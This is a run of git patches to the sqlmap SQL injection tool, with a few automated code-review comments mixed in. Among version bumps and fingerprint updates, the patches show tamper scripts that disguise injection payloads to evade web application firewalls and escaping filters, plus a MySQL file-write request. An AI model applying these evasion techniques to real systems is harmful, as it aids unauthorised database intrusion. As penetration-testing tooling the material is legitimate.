@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.43" +VERSION = "1.2.10.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8a3ee204033..6b893f61ffc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -8,7 +8,6 @@ acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ 708e9fd35dabcbfcd10e91bbc14f091f extra/icmpsh/icmpsh_m.py 2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py 1e5532ede194ac9c083891c2f02bca93 extra/__init__.py -fe141ec3178a46e7151c7f34bb747c68 extra/mssqlsig/update.py ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_ 1e5532ede194ac9c083891c2f02bca93 extra/safe2bin/__init__.py b6c0f2047e9bea90f4d5c5806c0f6a9a extra/safe2bin/safe2bin.py @@ -50,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -06e9273cc80dd4461dc5dc3518ca73a3 lib/core/settings.py +a1ed8cb875f1b56683b2b320ccb63197 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From d38a0542d831da179041862779d7d55bf9cac8ab Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 13:48:39 +0200 Subject: [PATCH 306/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/cloudflare.py | 1 + 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a7ca899dad6..dcfff689763 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.0" +VERSION = "1.2.10.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6b893f61ffc..428403d5391 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a1ed8cb875f1b56683b2b320ccb63197 lib/core/settings.py +5f2410ec4abd6170ac6244321a959323 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -404,7 +404,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py +a1d16d7106c9c66072aa58530c288515 waf/cloudflare.py a8affab0838c6a1fe683d5b7333d7a69 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py c84e515440fe482476c1f2687bd9960f waf/crawlprotect.py diff --git a/waf/cloudflare.py b/waf/cloudflare.py index e38f48e291d..249b4b8b528 100644 --- a/waf/cloudflare.py +++ b/waf/cloudflare.py 
@@ -25,6 +25,7 @@ def detect(get_page): retval |= re.search(r"CloudFlare Ray ID:|var CloudFlare=", page or "") is not None retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Please complete the security check to access")) retval |= all(_ in (page or "") for _ in ("Attention Required! | Cloudflare", "Sorry, you have been blocked")) + retval |= any(_ in (page or "") for _ in ("CLOUDFLARE_ERROR_500S_BOX", "::CAPTCHA_BOX::")) if retval: break From 1b6365b195c1c52159ecd44ee9986ecbdc2a7519 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 14:07:14 +0200 Subject: [PATCH 307/428] Minor cleanup --- lib/core/settings.py | 2 +- tamper/securesphere.py | 26 -------------------------- tamper/symboliclogical.py | 3 ++- tamper/unmagicquotes.py | 6 +++--- tamper/xforwardedfor.py | 2 ++ txt/checksum.md5 | 9 ++++----- 6 files changed, 12 insertions(+), 36 deletions(-) delete mode 100644 tamper/securesphere.py diff --git a/lib/core/settings.py b/lib/core/settings.py index dcfff689763..59a3fa0ba0d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.1" +VERSION = "1.2.10.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/securesphere.py b/tamper/securesphere.py deleted file mode 100644 index 998a69e2cc0..00000000000 --- a/tamper/securesphere.py +++ /dev/null 
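Review bot: The added `retval |= any(...)` line is the fourth consecutive expression to re-evaluate `(page or "")`; binding it once before the checks (`page = page or ""`) would let the new line and its three neighbours read as plain membership tests, though that touches context lines outside the hunk. The two new markers appear to be template identifiers from Cloudflare's error and challenge pages; a short comment naming where each string comes from would make future maintenance of the signature easier. `detect` starts outside the hunk.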
@@ -1,26 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Appends special crafted string for bypassing Imperva SecureSphere WAF - - Reference: - * http://seclists.org/fulldisclosure/2011/May/163 - - >>> tamper('1 AND 1=1') - "1 AND 1=1 and '0having'='0having'" - """ - - return payload + " and '0having'='0having'" if payload else payload diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py index ea34b54c98b..aad77f1722d 100644 --- a/tamper/symboliclogical.py +++ b/tamper/symboliclogical.py @@ -6,6 +6,7 @@ """ import re +import urllib from lib.core.enums import PRIORITY @@ -25,6 +26,6 @@ def tamper(payload, **kwargs): retVal = payload if payload: - retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) + retVal = re.sub(r"(?i)\bAND\b", urllib.quote("&&"), re.sub(r"(?i)\bOR\b", urllib.quote("||"), payload)) return retVal diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py index b6419e74d85..84746e9eb2f 100644 --- a/tamper/unmagicquotes.py +++ b/tamper/unmagicquotes.py @@ -25,7 +25,7 @@ def tamper(payload, **kwargs): * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string >>> tamper("1' AND 1=1") - '1%bf%27-- ' + '1%bf%27-- -' """ retVal = payload @@ -46,7 +46,7 @@ def tamper(payload, **kwargs): _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) if _ != retVal: retVal = _ - retVal += "-- " + retVal += "-- -" elif not any(_ in retVal for _ in ('#', '--', '/*')): - retVal += "-- " + retVal += "-- -" return retVal diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index e14b4909260..b0c8d85959e 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py 
@@ -14,8 +14,10 @@ def dependencies(): def randomIP(): numbers = [] + while not numbers or numbers[0] in (10, 172, 192): numbers = sample(xrange(1, 255), 4) + return '.'.join(str(_) for _ in numbers) def tamper(payload, **kwargs): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 428403d5391..a49cf03c9bd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5f2410ec4abd6170ac6244321a959323 lib/core/settings.py +501b38eaa341d98935b4fc3cecefaffc lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -265,7 +265,6 @@ a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py 759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py 078494e1217400b485ef653108d32699 tamper/randomcase.py 28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py -938bfac6e55a8823e4a66cd29166d980 tamper/securesphere.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py 4e6da2aca962b6110652e5f83dce5cd7 tamper/space2dash.py 7cdbae483262f66ef5d77521c59d9621 tamper/space2hash.py 
@@ -278,14 +277,14 @@ b55ed15af74ffefc4dc303646c7c6482 tamper/space2mssqlblank.py 72a547bc3bf32dba0d1c3093988df8af tamper/space2plus.py a74cd6375c5d5d253e2e7014b00ecd33 tamper/space2randomblank.py 93fc10b57586936cef05e88227c84ad0 tamper/sp_password.py -041cb567dff6bb6e7389e12ab3fb84c6 tamper/symboliclogical.py +690eb5200c9e61e54cd8952edaefda23 tamper/symboliclogical.py 6679c4ffb7322315a738dcfa68c6fb7c tamper/unionalltounion.py -51d20b5cb5a50fc2e44d39087f865d23 tamper/unmagicquotes.py +0a7e97374019321ffc606d41535f26d6 tamper/unmagicquotes.py cc212839f55692d422beef3a8e22a8d4 tamper/uppercase.py f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py -bb87c2c0ec66927015c9709aaaf93561 tamper/xforwardedfor.py +d8279aa1633e2485ed751eb0361d1c8e tamper/xforwardedfor.py 1ebf563bb2cb18b68ea952418bba0ec5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py From 03bbfdbc56b9bc83892e21277dddac0353a7c135 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 14:11:26 +0200 Subject: [PATCH 308/428] Can't work out of the box (too many unknowns) --- lib/core/settings.py | 2 +- tamper/nonrecursivereplacement.py | 40 ------------------------------- txt/checksum.md5 | 3 +-- 3 files changed, 2 insertions(+), 43 deletions(-) delete mode 100644 tamper/nonrecursivereplacement.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 59a3fa0ba0d..141b3560367 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.2" +VERSION = "1.2.10.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py deleted file mode 100644 index a0a7d04b0d2..00000000000 --- a/tamper/nonrecursivereplacement.py +++ /dev/null @@ -1,40 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -import random -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def tamper(payload, **kwargs): - """ - Replaces predefined SQL keywords with representations suitable for replacement filters (e.g. SELECT -> SELSELECTECT) - - Notes: - * Useful to bypass very weak custom filters - - >>> random.seed(0) - >>> tamper('1 UNION SELECT 2--') - '1 UNIOUNIONN SELESELECTCT 2--' - """ - - keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") - retVal = payload - - warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords) - warnMsg += "You can set it manually according to your needs" - singleTimeWarnMessage(warnMsg) - - if payload: - for keyword in keywords: - _ = random.randint(1, len(keyword) - 1) - retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal) - - return retVal diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a49cf03c9bd..95a547ffb4b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -501b38eaa341d98935b4fc3cecefaffc lib/core/settings.py +2f0cd79e7e10a6e137f4748a589c4c0b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -257,7 +257,6 @@ ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py 1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py -efd1917c6ccc632f044084a30e0e0f98 tamper/nonrecursivereplacement.py dcf3458f9010ca41bc4b56804f15792c tamper/overlongutf8more.py a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py 89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py From ed5f4abebd00a71f36cd366d978c100d4219fde1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 14:56:20 +0200 Subject: [PATCH 309/428] Minor updates --- lib/core/settings.py | 2 +- txt/checksum.md5 | 8 ++++---- xml/banner/generic.xml | 22 +++++++++++----------- xml/banner/set-cookie.xml | 22 +++++++++++++++++++--- xml/banner/x-powered-by.xml | 18 +++++++++++++++++- 5 files changed, 52 insertions(+), 20 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 141b3560367..613135d4fb2 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.3" +VERSION = "1.2.10.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 95a547ffb4b..17a56a06348 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2f0cd79e7e10a6e137f4748a589c4c0b lib/core/settings.py +40d7d26b71f11cbc128a0ef7c67e2da0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -457,17 +457,17 @@ a687449cd4e45f69e33b13d41e021480 waf/uspses.py 68e332530fab216d017ede506c3fec2f waf/yundun.py bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py 47f8f6623841232a93c5229d6c1bebfe waf/zenedge.py -dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml +e68f399aeaa5b516f043af88dd4871a0 xml/banner/generic.xml d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml 7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml 9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml 4970709ca31bcaea5eb79547a132606a xml/banner/server.xml d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml -58be20a3b29a9108d043786907700469 xml/banner/set-cookie.xml +5fa1805d3007c68b051f2c70afcf41ed xml/banner/set-cookie.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml -817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml +ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml diff --git a/xml/banner/generic.xml b/xml/banner/generic.xml index 27e8bdd8629..6e671825f0b 100644 --- a/xml/banner/generic.xml +++ b/xml/banner/generic.xml 
@@ -33,47 +33,47 @@ - + - + - + - + - + - + - + - + - + - + - + diff --git a/xml/banner/set-cookie.xml b/xml/banner/set-cookie.xml index 4e85296b8a6..fc454fcaaa0 100644 --- a/xml/banner/set-cookie.xml +++ b/xml/banner/set-cookie.xml @@ -19,19 +19,35 @@ + + + + + + + + + + + + + + + + - - + + - + diff --git a/xml/banner/x-powered-by.xml b/xml/banner/x-powered-by.xml index 633a35e5cff..64741769c85 100644 --- a/xml/banner/x-powered-by.xml +++ b/xml/banner/x-powered-by.xml @@ -1,6 +1,6 @@ - + @@ -15,6 +15,22 @@ + + + + + + + + + + + + + + + + From 79e45bd8d750d9b084bc55d3ab9c7839f5f63e78 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Oct 2018 15:10:31 +0200 Subject: [PATCH 310/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/banner/server.xml | 48 +++++++++++++++++++++++++++++++++++++++++-- 3 files changed, 49 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 613135d4fb2..05ab7c4fc2d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.4" +VERSION = "1.2.10.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 17a56a06348..7d88c2debad 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -40d7d26b71f11cbc128a0ef7c67e2da0 lib/core/settings.py +af9f01fd0d42d37f40e41f93907e2528 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -462,7 +462,7 @@ d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml 7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml 9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml -4970709ca31bcaea5eb79547a132606a xml/banner/server.xml +5f8975d03665aad58c3ee8acea85b06b xml/banner/server.xml d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml 5fa1805d3007c68b051f2c70afcf41ed xml/banner/set-cookie.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml diff --git a/xml/banner/server.xml b/xml/banner/server.xml index 737a13f143d..2a6fc28e300 100644 --- a/xml/banner/server.xml +++ b/xml/banner/server.xml @@ -802,13 +802,57 @@ - + + + + + - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + From 2e53096962bd37339ce7addc72ad0d6c89d3cc96 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 3 Oct 2018 11:02:13 +0200 Subject: [PATCH 311/428] Fixes #3268 --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 6 ++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 05ab7c4fc2d..68aa89b571c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.5" +VERSION = "1.2.10.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index a2af36e2b64..81bd880c385 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -181,8 +181,10 @@ def colorize(self, message, levelno): if level != "PAYLOAD": if any(_ in message for _ in ("parsed DBMS error message",)): - string = re.search(r": '(.+)'", message).group(1) - message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + match = re.search(r": '(.+)'", message) + if match: + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) else: for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted string = match.group(1) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7d88c2debad..5164c2219e1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -af9f01fd0d42d37f40e41f93907e2528 lib/core/settings.py +5192b4916a979e3fb249b72e3a89b3a6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py 
@@ -284,7 +284,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py d8279aa1633e2485ed751eb0361d1c8e tamper/xforwardedfor.py -1ebf563bb2cb18b68ea952418bba0ec5 thirdparty/ansistrm/ansistrm.py +b1c02296b4e3b0ebaa58b9dcd914cbf4 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From fd89fdf40b9100d2018516d00f22f73fd1403b31 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 3 Oct 2018 11:27:51 +0200 Subject: [PATCH 312/428] Minor cleaning up --- lib/core/common.py | 3 +-- lib/core/settings.py | 2 +- plugins/dbms/maxdb/enumeration.py | 1 - plugins/dbms/mysql/filesystem.py | 2 +- plugins/dbms/sybase/enumeration.py | 1 - plugins/generic/users.py | 1 - sqlmap.py | 6 +++--- txt/checksum.md5 | 14 +++++++------- 8 files changed, 13 insertions(+), 17 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 98ba41adfff..75d2eca2fed 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -165,7 +165,6 @@ from lib.core.settings import URLENCODE_CHAR_LIMIT from lib.core.settings import URLENCODE_FAILSAFE_CHARS from lib.core.settings import USER_AGENT_ALIASES -from lib.core.settings import VERSION from lib.core.settings import VERSION_STRING from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData @@ -3371,7 +3370,7 @@ def getLatestRevision(): """ Retrieves latest revision from the offical repository - >>> getLatestRevision() == VERSION + >>> from lib.core.settings import VERSION; getLatestRevision() == VERSION True """ diff --git a/lib/core/settings.py b/lib/core/settings.py index 68aa89b571c..e352d40f3ef 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
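Review bot: The rewritten doctest in the getLatestRevision hunk still asserts `getLatestRevision() == VERSION`, and the docstring says the function retrieves the revision from the official repository, so the example needs network access and passes only when the local checkout happens to match the published version; moving the VERSION import into the doctest line does not change that. Marking it `>>> from lib.core.settings import VERSION; getLatestRevision() == VERSION  # doctest: +SKIP`, or asserting on the shape of the returned string rather than equality with the local VERSION, would keep the doctest run deterministic offline. The body of getLatestRevision continues outside the hunk.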
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.6" +VERSION = "1.2.10.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index da2a502c115..b61946912cb 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ -from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index a81c9d1b65a..1ddc716c7ad 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -136,7 +136,7 @@ def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False): query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr) query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) payload = agent.payload(newValue=query) - page = Request.queryPage(payload) + Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) warnMsg = "expect junk characters inside the " warnMsg += "file as a leftover from original query" diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index f7d5b0970b7..97263bc7194 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py 
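Review bot: The new `Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)` call in the linesTerminatedWriteFile hunk discards the response, and if `silent=True` suppresses the request's usual error reporting as its name suggests, a failed write attempt leaves no trace before the code goes on to warn about leftover junk in the file. A debug-level line such as `logger.debug("sent 'write_file_limit' request for '%s'" % dFile)` placed after the call, or keeping the return value as a success indicator, would make a silent failure diagnosable. The enclosing method starts and ends outside the hunk, so whether a later step (for instance via `forceCheck`) verifies the written file is not visible here.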
